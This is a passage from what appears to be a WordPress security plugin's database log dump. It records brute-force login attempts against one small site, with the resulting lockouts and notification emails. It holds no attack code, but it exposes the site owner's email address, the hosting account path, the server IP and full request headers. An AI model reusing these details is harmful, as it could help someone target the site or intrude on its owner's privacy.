attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:28:49\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:28:49\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:43:49\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:43:49\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:28:50','2019-09-21 11:28:49',17884032,19289392,'https://bintara.com.my/2019/wp-login.php',1,0,'93.114.86.226'),(25606,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:28:50','2019-09-21 11:28:49',18089760,19289392,'https://bintara.com.my/2019/wp-login.php',1,0,'93.114.86.226'),(25607,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYJi3kXpgmG5P@iB8kW3AAAAIk\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.15.189.102\";s:11:\"REMOTE_PORT\";s:5:\"52154\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYJi3kXpgmG5P@iB8kW3AAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065355.9837\";s:12:\"REQUEST_TIME\";s:10:\"1569065355\";}}','notice','2019-09-21 11:29:17','2019-09-21 11:29:16',17799352,19289392,'https://bintara.com.my/blog/wp-login.php',1,0,'51.15.189.102'),(25608,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:29:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:29:16\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:44:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:44:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:29:17','2019-09-21 11:29:16',17884032,19289392,'https://bintara.com.my/blog/wp-login.php',1,0,'51.15.189.102'),(25609,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:29:17','2019-09-21 11:29:16',18089760,19289392,'https://bintara.com.my/blog/wp-login.php',1,0,'51.15.189.102'),(25610,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYJlbfBTP0kPOVnb8jqYAAAAFY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.120.254.133\";s:11:\"REMOTE_PORT\";s:5:\"56112\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYJlbfBTP0kPOVnb8jqYAAAAFY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065365.5822\";s:12:\"REQUEST_TIME\";s:10:\"1569065365\";}}','notice','2019-09-21 11:29:27','2019-09-21 11:29:26',17799768,19291368,'https://bintara.com.my/wp/wp-login.php',1,0,'188.120.254.133'),(25611,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:29:26\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:29:26\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:44:26\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:44:26\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:29:27','2019-09-21 11:29:26',17884584,19291368,'https://bintara.com.my/wp/wp-login.php',1,0,'188.120.254.133'),(25612,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:29:27','2019-09-21 11:29:26',18090304,19291368,'https://bintara.com.my/wp/wp-login.php',1,0,'188.120.254.133'),(25613,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYJuXkXpgmG5P@iB8kXFgAAAI0\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.163.100\";s:11:\"REMOTE_PORT\";s:5:\"50422\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYJuXkXpgmG5P@iB8kXFgAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065401.5547\";s:12:\"REQUEST_TIME\";s:10:\"1569065401\";}}','notice','2019-09-21 11:30:05','2019-09-21 11:30:02',17800016,19289880,'https://bintara.com.my/2019/wp-login.php',1,0,'142.44.163.100'),(25614,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:30:02\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:30:02\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:45:02\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:45:02\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:30:05','2019-09-21 11:30:02',17884552,19289880,'https://bintara.com.my/2019/wp-login.php',1,0,'142.44.163.100'),(25615,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:30:05','2019-09-21 11:30:02',18090272,19289880,'https://bintara.com.my/2019/wp-login.php',1,0,'142.44.163.100'),(25616,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYJyFiJ7D9Gn7wDPh8YkQAAAM8\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"173.249.57.89\";s:11:\"REMOTE_PORT\";s:5:\"60880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYJyFiJ7D9Gn7wDPh8YkQAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065416.5272\";s:12:\"REQUEST_TIME\";s:10:\"1569065416\";}}','notice','2019-09-21 11:30:17','2019-09-21 11:30:16',17799848,19289968,'https://bintara.com.my/test/wp-login.php',1,0,'173.249.57.89'),(25617,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:30:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:30:16\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:45:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:45:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:30:17','2019-09-21 11:30:16',17884696,19289968,'https://bintara.com.my/test/wp-login.php',1,0,'173.249.57.89'),(25618,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:30:17','2019-09-21 11:30:16',18090376,19289968,'https://bintara.com.my/test/wp-login.php',1,0,'173.249.57.89'),(25619,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYJ67fBTP0kPOVnb8jqZQAAAEo\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.81.84.140\";s:11:\"REMOTE_PORT\";s:5:\"50002\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYJ67fBTP0kPOVnb8jqZQAAAEo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065451.5443\";s:12:\"REQUEST_TIME\";s:10:\"1569065451\";}}','notice','2019-09-21 11:30:52','2019-09-21 11:30:51',17799848,19289968,'https://bintara.com.my/blog/wp-login.php',1,0,'103.81.84.140'),(25620,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:30:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:30:51\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:45:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:45:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:30:52','2019-09-21 11:30:51',17884696,19289968,'https://bintara.com.my/blog/wp-login.php',1,0,'103.81.84.140'),(25621,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:30:52','2019-09-21 11:30:51',18090376,19289968,'https://bintara.com.my/blog/wp-login.php',1,0,'103.81.84.140'),(25622,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKB3kXpgmG5P@iB8kXYwAAAIg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"89.44.32.18\";s:11:\"REMOTE_PORT\";s:5:\"44725\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bin